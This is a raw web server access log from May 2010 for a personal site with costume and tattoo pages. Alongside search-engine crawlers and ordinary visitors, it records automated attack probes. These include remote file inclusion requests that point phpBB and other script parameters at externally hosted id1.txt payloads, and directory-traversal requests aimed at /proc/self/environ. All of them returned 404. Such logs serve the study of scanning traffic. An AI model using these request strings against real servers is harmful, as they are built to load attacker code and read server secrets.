189.108.172.26 - - [06/May/2010:02:07:00 -0500] "GET //forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:02:07:00 -0500] "GET /logs/access_log.1262822400//forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:02:07:56 -0500] "GET /logs/access_log.1264982400//forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:02:08:00 -0500] "GET /logs/access_log.1264982400//forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:16:53 -0500] "GET //forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:16:53 -0500] "GET /logs//forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:16:53 -0500] "GET /logs/access_log.1262822400//forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.46.199.188 - - [06/May/2010:02:17:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [06/May/2010:02:17:20 -0500] "GET /logs/access_log.1264982400//forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:02:17:48 -0500] "GET /logs/access_log.1267401600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [06/May/2010:02:18:40 -0500] "GET /logs//forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:18:40 -0500] "GET /logs/access_log.1262822400//forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:18:40 -0500] "GET //forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:18:50 -0500] "GET /logs/access_log.1264982400//forum/toplist.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.46.13.100 - - [06/May/2010:02:19:22 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.40 - - [06/May/2010:02:23:25 -0500] "GET /logs/access_log.1240444800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.48 - - [06/May/2010:02:27:52 -0500] "GET /logs/access_log.1238284800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [06/May/2010:02:30:17 -0500] "GET /logs//forum/bb_admin.php?includeFooter=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:30:17 -0500] "GET //forum/bb_admin.php?includeFooter=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:30:17 -0500] "GET /logs/access_log.1262822400//forum/bb_admin.php?includeFooter=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:30:18 -0500] "GET //forum/bb_admin.php?includeFooter=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:30:18 -0500] "GET /logs//forum/bb_admin.php?includeFooter=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:30:21 -0500] "GET /logs/access_log.1262822400//forum/bb_admin.php?includeFooter=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.46.13.87 - - [06/May/2010:02:31:52 -0500] "GET /logs/access_log.1166486400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:02:32:16 -0500] "GET /logs/access_log.1247443200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.12 - - [06/May/2010:02:33:15 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.134 - - [06/May/2010:02:47:30 -0500] "GET /logs/access_log.1214265600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [06/May/2010:02:48:09 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:48:09 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:48:09 -0500] "GET /logs/access_log.1263600000//language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:48:09 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:02:49:44 -0500] "GET /logs/access_log.1269993600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.182 - - [06/May/2010:02:50:53 -0500] "GET /costume/thmb7.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [06/May/2010:02:56:57 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:56:57 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:56:57 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:56:57 -0500] "GET /logs/access_log.1263600000//language/lang_english/lang_activity.php?phpbb_root_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:03:02:33 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:03:02:33 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:03:02:33 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:03:02:33 -0500] "GET /logs/access_log.1263600000//language/lang_english/lang_activity.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.142.163.25 - - [06/May/2010:03:04:40 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://search.yahoo.com/search?ei=utf-8&fr=slv8-cclean&p=oldtimers%20tattoo%20designs&type=""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)"
67.142.163.25 - - [06/May/2010:03:04:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)"
207.46.13.46 - - [06/May/2010:03:10:21 -0500] "GET /logs/access_log.1200787200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:03:15:47 -0500] "GET /logs/access_log.1258761600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.158.109.250 - - [06/May/2010:03:16:27 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.com.mt/url?sa=t&source=web&ct=res&cd=2&ved=0CA0QFjAB&url=http%3A%2F%2Ftomdolan.pconline.com%2Fcostume%2Fcostume1.htm&rct=j&q=costume%27s+nations&ei=23riS72yC9ueONrD4NsN&usg=AFQjCNFn_Fhztj_Mt6HcQnuvgToxrlMoZw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
195.158.109.250 - - [06/May/2010:03:16:27 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
195.158.109.250 - - [06/May/2010:03:16:27 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
195.158.109.250 - - [06/May/2010:03:16:28 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
195.158.109.250 - - [06/May/2010:03:16:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
195.158.109.250 - - [06/May/2010:03:16:41 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
195.158.109.250 - - [06/May/2010:03:16:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
67.195.112.180 - - [06/May/2010:03:19:02 -0500] "GET /logs/access_log.1180828800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.91.132.141 - - [06/May/2010:03:20:37 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
213.91.132.141 - - [06/May/2010:03:20:37 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
213.91.132.141 - - [06/May/2010:03:20:37 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
87.250.255.243 - - [06/May/2010:03:27:29 -0500] "GET /logs/access_log.1230854400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.44 - - [06/May/2010:03:32:40 -0500] "GET /logs/access_log.1235952000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.223 - - [06/May/2010:03:33:22 -0500] "GET /logs/access_log.1268265600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:03:48:18 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [06/May/2010:04:02:57 -0500] "GET /logs/access_log.1227225600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.179 - - [06/May/2010:04:05:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.67.201.187 - - [06/May/2010:04:09:59 -0500] "GET /logs/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:09:59 -0500] "GET /logs/access_log.1262304000/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:09:59 -0500] "GET /video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:00 -0500] "GET /logs/access_log.1265932800/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:03 -0500] "GET /logs/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:03 -0500] "GET /video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:03 -0500] "GET /logs/access_log.1262304000/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:03 -0500] "GET /logs/access_log.1265932800/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:04 -0500] "GET /video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:04 -0500] "GET /logs/access_log.1262304000/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:05 -0500] "GET /logs/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:11 -0500] "GET /logs/access_log.1265932800/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:27 -0500] "GET /video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:27 -0500] "GET /logs/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:27 -0500] "GET /logs/access_log.1262304000/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:27 -0500] "GET /logs/access_log.1265932800/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:34 -0500] "GET /video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:34 -0500] "GET /logs/access_log.1262304000/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:34 -0500] "GET /logs/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.67.201.187 - - [06/May/2010:04:10:34 -0500] "GET /logs/access_log.1265932800/video.php?content=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.71.205 - - [06/May/2010:04:11:47 -0500] "GET /logs/access_log.1237507200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [06/May/2010:04:17:01 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.38.34.19 - - [06/May/2010:04:27:18 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:04:27:18 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:04:27:18 -0500] "GET /logs/access_log.1265241600//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:04:27:25 -0500] "GET /logs/access_log.1264377600//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.218.116.131 - - [06/May/2010:04:27:57 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.195 - - [06/May/2010:04:37:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:04:40:32 -0500] "GET /logs/access_log.1227744000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.84 - - [06/May/2010:04:42:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.84 - - [06/May/2010:04:42:52 -0500] "GET /logs/access_log.1175817600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.234 - - [06/May/2010:04:44:52 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:04:52:45 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.175.146.45 - - [06/May/2010:04:56:27 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
212.175.146.45 - - [06/May/2010:04:56:27 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
188.134.33.20 - - [06/May/2010:05:00:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:25 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:26 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:26 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:26 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:26 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:45 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:45 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
188.134.33.20 - - [06/May/2010:05:00:46 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
